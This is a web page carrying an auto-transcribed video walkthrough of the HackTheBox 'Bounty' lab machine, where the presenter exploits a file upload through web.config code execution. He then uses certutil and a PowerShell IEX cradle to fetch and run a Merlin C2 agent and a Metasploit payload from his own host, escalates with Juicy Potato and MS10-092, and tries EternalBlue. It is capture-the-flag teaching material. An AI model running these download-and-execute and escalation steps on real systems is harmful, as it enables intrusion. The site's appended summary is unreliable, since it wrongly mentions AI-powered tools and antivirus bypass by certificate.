HackTheBox - Bounty

IppSec · Beginner ·🔐 Cybersecurity ·7y ago

Key Takeaways

The video demonstrates a cybersecurity walkthrough of the HackTheBox Bounty challenge, utilizing tools such as GoBuster, Burp Suite, and Metasploit to exploit vulnerabilities and gain access to the system. The challenge involves exploiting file upload vulnerabilities, executing code, and escalating privileges.

Full Transcript

what's going on YouTube the Zips I'm doing bounty from hacked a box which was one of the easier machines all you have to do is find out it accepts file uploads at transfer aspx and then realize it's a old version of iOS so if you upload a web config file with ASP code at the bottom it will execute it so we're gonna do that and because I don't like just doing 15 minute videos we're gonna do the prim SK few other ways it's a unpatched 2008 bucks so almost anything throw at it will work and then we may end up doing some little code exercise to automate the file upload so all that being said let's just jump in as always the first thing we do is and map - SC for default scripts sv and array versions Oh a output all formats put in the end map director and call this bounty then the IP address which is ten ten ten ninety three can take some time to run so I've already run it looking at the results we see only one port is listing that is 80 and of course it is HTTP and the version is microsoft iis httpd 7.5 and based upon the version name we gravure a number we know this is most likely going to be Windows 2008 r2 we wanted to we could just Google like I is Microsoft versions and the first result would bring that yeah bring back a table and we can see 7.5 is 2008 r2 so let us I guess just go to the web page and see what it hosts so 10 10 10 93 and we just get a picture so I'm gonna do ctrl shift you well maybe just ctrl you to view the source of the page and just see what is there we don't really have anything we have Merlin JPEG and that's it we got some CSS stuff here but it's not really leaking anything so I'm gonna go over to go Buster and we do go Buster - H and I will do - you for URL HTTP 10 10 10 93 then we want to do - W forward west I'm going to use a share word list doorbuster and then directory list 2.3 and this I'm going to do small text just for the sake of time I normally do medium but we'll also have to do one other thing in this go Buster because we have to find a file on this box and that's just something I know I just go busted around till I found the file and as a word list says this is for directory list but commonly if you just put an extension on a directory name it could be a foul name because of how names work so let's try say we can find what type of files this host can go like robots.txt because that commonly places files and we don't get anything so I'm gonna take a leap of faith because it is iis and just gonna say hey let's try the extension aspx and then one do - oh for our file when we do go Buster - default.aspx dot log this is gonna take some time to run so I'm gonna pause the video and we'll see what the output is go Buster has found transferred aspx so let's go take that take a look at that so Bryce transfer aspx and we just get a file upload form so the first thing I'm gonna do is just create a test aspx file it's just like PHP if we can upload aspx put them alysha's 1xq code and get shell so let me get rid of that box there we go so we'll do echo please subscribe and direct that into epic aspx so now when we go to upload this we get invalid file so let's try a different extension let's try something like JPEG browse epic JPEG file has uploaded successfully so let us go into burp make sure proxy is set to on and let's reload this so upload it JPEG click upload go to burp send this repeater click go render this we see file uploaded successfully and we can start playing with extensions so we can do it SEC dot gif click go I'll upload it successfully we do aspx will probably see invalid file please try again so let's try other things we can do txt and valid file so it looks like it only wants image names what I'm going to do is create just a list of extensions to quickly automate this and then at the end of the video we're gonna do this a bit better manually and Python but for the sake of QuickTime and doing a good walkthrough let's just do a bunch of things so config aspx PHP PHP 7 ASP what other things can access PL CGI exe let's just try those for now so I'm going to right click this send it to intruder and if you own the free version of Boop it goes slower that's why I'm going to show you how to do it without it I cleared the little squiggly things click it twice to put something here and we'll say extension and what this does is everything between these little symbols is a payload and then we can change payloads quickly so let's do load bounty extensions ok and then you just click go start attacking and we see everything was a 200 however there was only one that was a length of 1350 and that's the content length of this response and the reason why it's 1350 is because it says file uploaded successfully instead of in the invalid file please try again so this is five characters longer than this which is how we identify that config is allowed so with this information I'm just going to Google let's turn poop off and we'll say aspx file upload RCE config because we can do that extension and if we didn't use config I think this blog will still still come back and my Firefox is gone incredibly slow since it updated yeah so we just go to this website which looks like it's there we go again just going slow we see the website essentially says if you put aspx at the bottom of a web config direct file then you can execute it I think this is patch now it's a old version of I is so that's why why it's 2008 r2 but it's cool exploit I'm not gonna copy it directly from here because let's zoom in whoops I see these quotes are not directly up and down so this is some weird unicode quote that I hate and always just causes issues I'm gonna go to his article that he links and see if where he got it from also has the same encoding issue and it looks like it doesn't so these are as I expect we can copy this be web config paste it in running ASB if you see three bio plane we'll try this not exactly sure what this code is doing let's see browse web config upload and let's go to web big not found let's redo this whole thing because I think it was stuck on intercept so web config file was uploaded going here nothing we go back look at go Buster there's a directory uploaded files so let's try that not found let's try uploading it again so browse web config is that what it said yeah web doc config is in the title upload hit it and we get three and it's doing exactly as the tech said it was running ASP code if you see three by opening this so it's doing response dot right one plus two so if it executes response dot right it's running ASP and if you do one plus two you're doing math and saying yes not only did we execute a command from aspx or ASP but we also had it do some type of arithmetic which proves code execution so let me swap out the show with one we've done before so cat shells aspx is it there os shells grap ASP web dot aspx there's one I want to use so I'll cut this out so you can see it forget what video we did this on it's just a simple spxl I like to execute commands so if we go let's see I'll go into burp query history turn burp on file upload web config intercept this go to repeater and then just paste the code we want and let's run CMD /c who am i click go we can turn Boop off now go to web config and we don't get any output so what I'm going to try to do is let's do cm be /c ping 10 10 14 I think I'm 17 I've config tun 0 I am 17 click go TCP dump - I tun 0 ICM P go to web config and I see the server is pinging me so I just didn't do it correctly to get the response back but we can see we had code execution because of that so let us do suit util to download and execute something so let's see we want to do let's use Merlin because if we go to the homepage we got a picture of a wizard so let's use Merlin for this box github Merlin and let's set this up so get clone and this is just another thing like Empire or Metasploit it uses HTTP T HTTP 2.0 so it's a bit more hit in that way and because it's not as known it may fly under the radar of antivirus so when the Merlin directory the first thing we have to do is create a x.509 certain SSL request x.509 new key RSA 4096 sha-256 no des it sounds like a spell nodes but it's no des no des - key out - now key out is server key then we want out server dot certificate and the subject is going to be CN we can call this anything we want so we'll do if sect rocks it could be calm or whatever is just any PLD doesn't matter cuz we're using IP addresses anyways it's just for the shirt generate that and we'll be valid for seven days we got the key so the next thing we should do is start Merlin so we can do go run CMD Merlin server main go and it's weird why'd it exit on me see it's not it reset there we go netstat a LNP grip for 4-3 kill 1 1 0 8 8 let's do kill - 9 ok 4 4 3 is open again now let's try this again go run CMD Merlin server may not go and Merlin has started we do notice it is listening on one 27001 so if we do - i 10/10 14 17 we can change what host it listens on the next thing we didn't have to do is tell Merlin a compile the Merlin agent so let's go into Merlin CMD Merlin agent then we can do go OS is equal to windows go Ark is equal to amd64 so this is telling go to compile a windows binary that is 64-bit go build and if you do LD flags - X main URL 10 10 14 17 4 4 3 you can change the default URL in the binary otherwise you have to execute Merlin with an argument of the hostname but doing this just hard codes it - OH for out file Merlin exe that's what we call this agent Exe and then the file we want to compile is main go unsupported you know unsupported go Ark is it just win windows there we go doesn't like the capital W Linux being case sensitive so we can do file agent exe we see it as a PE 32 plus 64 bit if we had got rid of go OS and go arc and we'll just compile to test we can see it's an elf which is Linux so now we got the moment agent so let's make a directory a TB boxes bounty dub-dub-dub copy the agent into it and then just on python m simple HTTP server actually let's do it in this window server 80 and we can go back to writing a config to hack all the things I already had it in window 1 do I have it somewhere then web config huh oh I was editing it and burp that's why it's not there okay that makes sense so we want to do cert util - URL cash - split - f file HTTP 10 10 14 17 agent exe and when I save it - C : users public agent exe and then we want to execute it so and and C : users public agent exe click go and then we have to go back to a browser and do web config to execute it we look at a Python thing nothing happened don't do anything so let's see render file was uploaded successfully so util - URL cache - split - f10 10 14 17 agent exe let's just get rid of this for now and only download the file then go and I was in the wrong directory simple HTTP server in the dub-dub-dub directory go web config and here we go it is downloading agent exe and then we can do another one just to execute it so this is download and then we need a request to execute agent exe we just this click go and run it internal survey so maybe it doesn't like these double slashes do single slashes go still internal server error looking back we don't have any callbacks so let's try CMD /c and it looks like it's hanging which is a good sign going back to a terminal prompt there we go so for some reason we need just to preface that with CMD / c to start a command and we have a agent check-in so i can kill my web server we can do agent list and see what agent we have i guess the next step to do would be agent interact and we can do info and see what it is windows 64-bit everything we'd expect the only thing I'm going to do now is change the wait time from 30 seconds to 5 seconds so set sleep 5 s and then the next time this thing checks in it'll change it to check in every 5 seconds instead of 30 seconds we do help we can see we can execute commands upload files download files etc if we do back there is help here we can do use module and then it has a bunch of modules we can do we want we can do Windows x64 tab and then we can see all the various modules we can do let's do I guess power up do info set agent in fill set agent we have 2 agent list use this module set agent okay that may be a visual bug if you do info here the named agent is an uppercase doesn't work lowercase it does so that's what what's happening there we're gonna do BCC info and then we can just do run and it creates the job and will now be running power sploit power up so we'll see what this outputs back and we see one flaw of something I don't really like about Merlin is its commands or its things in order I guess to update easier always pulls it from github and hack the Box doesn't have internet so none of these modules will work because I think is doing IX against github constantly and yeah so should be linked in the github project in my opinion without that doesn't really help us so let's just go back and do agent interact info and we want to do not info help we can run commands so we can do CMD who we have my slash Prive go to the job and we see we do have the SE impersonate privilege we can also do like system info CMD system info and this will show us what patches are installed and we see the hotfix is nothing so this is just a fresh install of Windows 2008 r2 and it's 7600 in this version so this is not even Service Pack 1 this is just Windows 2008 or two so whenever that was released everything after that's gonna be vulnerable so I'm guessing things like a tonal blue can't think of any other privates that come out MS 1603 too but I think that one's the one that requires too to elevate this one only has one but all those will work on this box because it just has been patched however with the SEM person a privilege we don't even need like a dangerous exploit we can just use rotten potatoes or juicy potato so I'm gonna go download that juicy potato github and let's do decoders decoder okay that's it I just didn't recognize the username OHP II we go to release download it and I forget what video but there was a video where we actually compile it maybe that's fighter I think that guy's a fighter but let's copy downloads juicy potato I'll just call this JP because typing that's a pain exit we can upload route htb boxes bounty JP Exe to see : users public JP exe and you'll notice I have the habit of always doing two backslashes one on Linux just have it I guess a lot of times though backslash is escape so you just see like C : users public JP without the slashes so now to have it always do to file has been uploaded so we can do CMD C : users public JP exe and see what arguments we need - tea stirred to try both sure the program let's do C : users public agent exe to call back a removal and agent that we jump in the box and the comport doesn't matter so we'll do 9001 because well it's over 9000 created the job and we have off the resort result as anti-authority system and don't have we got a check-in agent list we should see Merlin with a new check-in that's odd let's do two slashes let's see if this changes anything okay there we go so it did exactly as I said probably and escaped one slash and but this slash wasn't escaped and just past a bad path so that's why I'm always in the habit of doing - so we got a new check in agent so we can do agent list and we see the second agent as NT Authority system so we can interact with this and then do CMD dir sequel and users administrator desktop or we could even probably download download desktop route text is that where it is let's see AK agent list says the agents active it's not giving responses and felt oh crap it's on a 30-second sleep time so sleep 5s and let this chick in because waiting 30 seconds per command is a little bit annoying we have it now saving the file I have no idea where that saved instead of trying to guess I'm just going to use find root txt we probably specify star there it is and I can go over to exec WC - seed account characters opening close squiggly brackets to put contents of each found and we see 32 characters on desktop route our text so we have that box done if we wanted to we could do other paths so let's do this box through Metasploit and we won't use juicy potato the first thing we do is go to trusted sex unicorn tool which is my favorite way to load Metasploit you can look at it and we want to do windows meterpreter reverse https r.i.p ten ten fourteen seventeen and we'll listen on port 9001 it's gonna take a little bit to generate the shell code but once it does we'll be able to input it into a book so let us do powershell IX new object net dot web client download string HTTP 10 ten fourteen seventeen unicorn dot txt is what we'll call it okay our payload has been created so let's copy powershell dot txt into root htb boxes bounty dub-dub-dub unicorn dot txt and then we can start Metasploit by just doing MSF console - are you know coin Darci because it created that file for us and then go into dub-dub-dub and start a web server eighty there we go everything looks good let's go in the book send this payload go to a web browser we have to execute web config and we don't have a callback on a web so we definitely don't have Metis point let us try changing the payload a little bit will do CMD / see mr. the command prompt then to load MIT PowerShell try this now still not getting anything let's see let's just do this in the new browser window definitely hangs we have a typo here HTTP 10 10 14 17 we don't have a typo that looks good try - see for command everything looks good go hit refresh go and we're not getting any callbacks so something's wrong with our payload well I just need to revert this server so let's see CM d /c powershell - c IX new object so when in doubt let us just go back and we'll do a ping because we know ping works so ping 10 10 14 17 and if this doesn't work then we know the box got food board so TCP dump - i ton 0 ICMP it's another valid reason why always start with minimal recon so you know something that works so the file doesn't exist upload it go taking a little bit and we're not getting any things back we can try CMD /c load up load and still nothing drivers in this new tab so it looks like something we had done where someone else screwed up this box because our basic payload of ping no longer works the box should be rebooted now so let's try it again we click go we get my internal server error we render this think this event validation viewstate cookie aren't the same so let's see make sure burp is set off go here 10 10 10 93 let's view the source for transfer and copy these values view state go back to repeater and the next one was that validation we copy these two click go there we go file uploaded that's what we expect so now we can click go here and we get pings so the box was indeed broken so let us now go back and try this PowerShell thing don't leave it here I did so power show ie X download string click we'll just do CMD / c to be safe so that's gonna spawn a command prompt and then do powershell click go it's same thing and so copying both of those let's just copy the command where does command yeah this click go if I was been uploaded its page again there we go we finally got unicorn and is it going to execute does not look like it it hit it but did not execute so we must have an error somewhere so powershell IX new object download string unicorn txt and do see try that oh it was just taking a while being slow we got a session open so with a new Metasploit session we can do search was it suggester local exploit here we go we can run this post module show options set session to 1 because 1 is meterpreter session 1 opened and then we run this and we're going to check all the local exploits and I just noticed we're on a 64-bit version of interpreter so we're gonna run this twice once on one a 32-bit version of interpreter I noticed by that x86 windows so I'm going to run this twice I'm going to run this as 32-bit migrate to a 64-bit process run it again and see what the differences are and collected all the exploits and now it is trying them and as we expect it's vulnerable to almost everything so we could just migrate to a 64-bit real quick so let's copy this go to a new window B 32 and then V 64 to compare the difference we probably enough to go by to pop this machine but for the sake of learning let's see everything so we do in session - I won - enter I think it's Paul sessions - I won to enter a meterpreter shell we can do a PS to view all the processes and we want to pick a 64-bit process to migrate into so let's try I don't know I always hate migrating into PowerShell or command prompts because they tend to go away quickly don't know what w3p is but let's say we can migrate into it migrate one three nine six that was at w3 WP process and we'll see if it actually successfully migrates if not then we can try like PowerShell or a con host or something else but the key thing is just looking for something that was owned by me and had x64 there we go it says it's migrated we do help I forget what it is one of the info commands file system core commands info no file system networking it's this info yeah if this says yep meterpreter shell is 64-bit so now we can migrate this run the local exploit suggester again and we see the differences it's gathering local exploits for x64 windows instead of x86 windows so let this one run and then we'll paste it over on the other pane and compare the differences instead of though like 40 different exploits the 32-bit had this one has 18 and only three were found to be vulnerable so copy this go to the other pane and paste that in so the one that sticks out is the very top one ms 1009 T to schedule elevator because that is on both of them so let's go and use that copy the exploit use show options set session one and run this and we'll see if this one works if not we'll have to migrate back into a 32-bit process and try it again because meterpreter exploits or pick you like that and I know straight off the bet it's not gonna work because a call back IP is my win IP so set L host ton 0 I always do it twice because I think there's a bug where it doesn't take sometimes and looks like it's reliable we're sending it and we got session to open so let's background sessions and we see session 2 is anti-authority system at bounty so that is another way to prove ask if we wanted to we could also just do like eternal blue and pivot through the firewall because we do sessions - I 1 CMD shell net stat - a I showed it down a and to not do DNS lookups and is gonna take a while so 445 is listening on this box there's just a firewall that blocks it for 45 is Samba it listens on almost every Windows Server box you never really see it turned off you just firewall what it can talk to so since this hasn't been patched we can do a ton of glue as well let's just ctrl C to terminate this channel so to do that we want to create a pivot through this meterpreter session so we're going to do port FWD - H for help and we need port forward and then the verb we want add and then here's all the options we can do we're going to want to listen on 0.4 4 or 5 and then connect to the host port 445 through this meterpreter session so we want the - L - P and - are flags so let's do put forward ad - L 4 4 5 - r1 27001 and - P hold on excuse me - B 4 4 5 so it's cleared this relay so it's listening on our port 445 sending it through this meterpreter session and going to the remote host port 4 4 5 so if we look and do a net stat - a n grep 4 4 5 we see our host is now listing on port 445 I've said four four five a lot so we'll stop but search eternal blue search was it ms 1701 oh there we go let's see use which one do we want probably this one show options set our host a1 27001 and then l host set tell host to be Don 0 and that should be good so we'll run eternal blue it connects to output for 4-5 Fords it through and we see it attempting unable to continue with improper OS architecture let's see what did that fail dce/rpc service may be blocked so let's try 139 and 138 as well I think there's our other SMB ports so sessions - I one put forward 1 38 39 it was not using UDP and 137 now exactly sure which 1 3 port SMB is but doing those 3 should cover it so now run again and it still can't determine our Kotetsu let's do show Advanced Options can we manually set architecture verify target set verify architecture to false and we'll see what happens with this when you start doing things like this and disabling the verification checks you may crash the box more often than not so sending it it says it completed successfully but you don't have a shell so it's still trying to trigger this over as well the first attempt has failed it's trying again failed for the second time and now it's trying with 22 grim allocations whatever that means I know there's a talk on YouTube if you search for like DEFCON eternal blue or Ms 1710 there's a really good technical talk that I just haven't got a chance to listen to yet but still trying I'm guessing this probably won't work but it was worth giving a shot actually since this is going to take a while to run we're gonna background this and put a reminder eternal blue and well that goes since it probably as I say that it finishes and says no exploit created let's just do show Advanced Options one last time to see if there's anything else we can do that may help it along Mac's exploit times 3 see I got the architecture correctly got the platform correctly see everything looks good we'll just do max exploit attempts to like 15 and then try something else so exploit attempts we'll do 20 run and then let's take a step way back because we've pretty much done this box maybe three if I turn a blue ever works but at least you know how to do the port forwards now let us take a step even further back to go all the way to how we discovered this file upload piece this thing so what we're going to do is create a Python script to automatically do all of this so let's go and do VI upload pi and we're gonna need the request module and we also want regular expressions because we know we have to grab whatever these are the viewstate and event validation so regular expressions will help with that and request is of course the module to connect to websites so here's a start of the script since we're going to be uploading a bunch of files we want to create this in a function so we have to read write code so we'll just do a function test upload file name and then the URL to the upload is HTTP 10 10 10 93 transfer dot aspx and then we have to create a recession so s precession you can put anything you want there but request session another initiated so what that's going to do is when we go to a web page if the server sends any cookies or anything it's going to just remember that and send them in the future so our request is gonna be session dot git and then the URL so if we did print dot cookies I think one will work like this and we just call test upload please subscribe and Python 3 upload pie I forget how to call the cookies jar huffed up my head Brent oh alright cookies 0 like this and we don't have any cookies because the server didn't send us any but if we did they'd appear here so that's what that does the main reason why we have to do this is because we're not interested in the cookies we're interested in this text so we see we want this event validation and viewstate because remember what happened them when I reverted the box and didn't have this is it data error of 500 so we need to do a regular expression to grab these two pieces of data so we'll do the viewstate first we copy this we can just do the viewstate is equal to or a dot find all and then paste in then parenthesis dot star question mark and parentheses and that single quote in the expression or dot text is the text it wants to search and then we're going to grab the very first result so 0 so if we do print view state we get the view state and this may be different on every load i'm not positive looks like that doesn't change so the next piece we want is this event validation so let's grab this and do event validation is equal to re-find all I paste again dot start question mark and then and at all text zero so if you're wondering with that dot star question mark is let's just match any character unlimited amount times until double quotes is what that regular expression is saying so we can print event validation to verify that it works it did not so let's see event PA l idat IO n that is correct we did something wrong oh all right text and then zero on the end there we go so we got both the viewstate and event validation and there's a vet validation change constant way it does not so we don't have to get these every time but for the sake of the script we are gonna get them every time and pretend they're like a cross-site request forgery thing which is in the sense video is where required cross-site request forgery is so pretend it's there and this is what that's doing so the next thing we have to do is create a post request so post data is equal to and it's gonna be a dictionary view state and what this is doing is creating these pieces the variables it's sending so you state then we want event validation station and I think that's it so we got the two arguments here and this one is a file name so you do that a little bit differently because if you look at the request it's got a extra parameter file name and the request module has something for that so we'll do upload did file is equal to file upload one that is this the name and then we do a tuple file name and then the contents of the file please subscribe and that's how we do the file upload and the final piece is just making that final post request so we'll do R is equal to s compost URL files is equal to uploaded file data is equal to post data and it should be it returned alright dot txt and we'll do test upload we can print this and I miss type something I have port instead of post sponsz i short handed something te XD there we go but we don't have that like invalid file or anything it did an error so something odd happened let's try doing a proxy so we'll do burp is equal to HTTP HTTP 1 27001 8080 and in this post request we can set the proxy so proxies is equal to burp the proxy tab intercept on send this to repeater and let's compare so we've got the viewstate viewstate ----eventvalidation' ----eventvalidation' the file name so file upload one file name web da config file upload one file name so that looks good and then we got button upload upload and I forgot to code that one so let's go back in a script and we'll add BTN upload upload execute this and the new request this one has BTN upload as upload for DES and we get invalid file so what we can do with this they say response is equal to task upload and we'll do file name actually let's just create the loop now so we can do four line and open word list extensions dot list as read and then print line dot strip and let's create extensions dot list and we'll do PHP ASP aspx config test please subscribe jpg gif png HTML we'll do all those things so when we run upload by mail it just loops through them so we do them upload pi and let's see putting so we want to do response is equal to test upload and then if sec dot will call this extension and rename line to extension okay and then say if invalid file not in response print exemption so when you run this I can go through burp again we didn't disable that so turn intercept off and huh if invalid file not in response so let's print response see what this is because all those should have been invalid file pages and error so we have something screwed up because we're getting 500 errors if we go to burp HTTP history we can look at this the response runtime error where is a file name if sec and then it's got a newline character at the end so I think that's what 0a is so let's see if we do four line and extension response see Python 3 X is equal to ABC X negative 1 there we go just finding a way to trim the very last carrot go off we want this one negative 1 trim that very last character and see what happens still airing out see upload plus I want the native one there there we go we're not getting 500 years anymore so the issue was I was taking one off the whole response of the test upload I needed to move that next the extension there longer print response just print the extension and we can see out of extensions dot lists for extensions that we're allowed is config JPEG and gif so that is gonna conclude the video hope all that made sense take care and I will see you all next week oh wait I forgot a tonal blue still going doesn't look like it's going to work it probably just doesn't have the offsets for this OS so oh well well if you want to do a watch eternal blue check out the blue video so yep now it's it take care I'll see you all next week

Original Description

00:38 - Begin of recon 01:48 - Gobuster, using -x aspx to find aspx pages 03:16 - Playing with a file upload form, seeing what can be uploaded 05:15 - Using Burp Intruder to automate checking file extensions 07:00 - Finding a way to execute code from file upload in ASPX (web.config) 10:55 - Executing code via web.config file upload 13:08 - Installing Merlin to be our C2 15:25 - Compiling the Merlin Windows Agent 18:37 - Modifying web.config to upload and execute merlin 21:14 - Merlin Shell returned! 24:18 - Checking for SEImpersonatePrivilege Token then doing Juicy Potato 27:44 - Getting Admin via Juicy Potato 29:44 - Box completed 30:00 - Start of doing this box again, with Metasploit! Creating a payload with Unicorn 33:00 - Having troubles getting the server call back to us, trying Ping to see if the exploit is still working 34:17 - Reverted box. Have to update our payload with some updated VIEWSTATE parameters 36:45 - Metasploit Session Returned! Checking local_exploit_suggester 40:01 - Comparing local_exploit_suggester on x32 and x64 meterpreter sessions 40:30 - Getting Admin via MS10-092 42:05 - Attempting to pivot through the Firewall using Meterpreter and doing Eternal Blue! (Fails, think I screwed up listening host #PivotProblems) 47:20 - Creating a Python Script to find valid extensions that handles CSRF Checks if they had existed
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 60 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches viewers how to exploit file upload vulnerabilities, execute code, and escalate privileges in a cybersecurity challenge. Viewers will learn how to use tools such as GoBuster, Burp Suite, and Metasploit to gain access to a system. The challenge involves exploiting vulnerabilities in a web application and using AI-powered tools to analyze system vulnerabilities.

Key Takeaways
  1. Map the target IP address
  2. Run GoBuster to find the transferred.aspx file
  3. Upload a JPEG file to the transferred.aspx page
  4. Use Burp Suite to proxy the upload and view the response
  5. Try uploading different file types to see which ones are accepted
  6. Use Merlin to execute code on the Bounty box
  7. Create a certificate using OpenSSL to bypass antivirus detection
  8. Compile the Merlin agent using Go to create a Windows binary
💡 The key insight from this video is that file upload vulnerabilities can be exploited to execute code and escalate privileges, and that AI-powered tools can be used to analyze system vulnerabilities and aid in exploitation.

Related Reads

📰
Vulnhub: Shenron-1 Walkthrough
Exploit a vulnerable Linux machine using credential exposure and kernel exploit to gain root access
Medium · Cybersecurity
📰
The Day I Realized Technology Is About People, Not Just Code
Technology is about people, not just code, and understanding this is crucial for success in the field
Medium · Cybersecurity
📰
🚀 I Built CODELIVLY — A Platform to Learn Cybersecurity Through Hands-On Practice
Learn how to build a hands-on cybersecurity learning platform like CODELIVLY and improve your skills in cybersecurity and platform development
Dev.to · Rocky
📰
The Silent Killer in Your Node.js APIs: Mass Assignment & How to Catch It Before Production
Protect your Node.js APIs from mass assignment vulnerabilities by going beyond ESLint and SonarQube checks
Medium · AI

Chapters (21)

0:38 Begin of recon
1:48 Gobuster, using -x aspx to find aspx pages
3:16 Playing with a file upload form, seeing what can be uploaded
5:15 Using Burp Intruder to automate checking file extensions
7:00 Finding a way to execute code from file upload in ASPX (web.config)
10:55 Executing code via web.config file upload
13:08 Installing Merlin to be our C2
15:25 Compiling the Merlin Windows Agent
18:37 Modifying web.config to upload and execute merlin
21:14 Merlin Shell returned!
24:18 Checking for SEImpersonatePrivilege Token then doing Juicy Potato
27:44 Getting Admin via Juicy Potato
29:44 Box completed
30:00 Start of doing this box again, with Metasploit! Creating a payload with Unicor
33:00 Having troubles getting the server call back to us, trying Ping to see if the
34:17 Reverted box. Have to update our payload with some updated VIEWSTATE paramete
36:45 Metasploit Session Returned! Checking local_exploit_suggester
40:01 Comparing local_exploit_suggester on x32 and x64 meterpreter sessions
40:30 Getting Admin via MS10-092
42:05 Attempting to pivot through the Firewall using Meterpreter and doing Eternal B
47:20 Creating a Python Script to find valid extensions that handles CSRF Checks if
Up next
Hacking used to be fun. Now it's crime rings. #insurtech #podcast #insurtechgeek
The InsurTech Geek Podcast
Watch →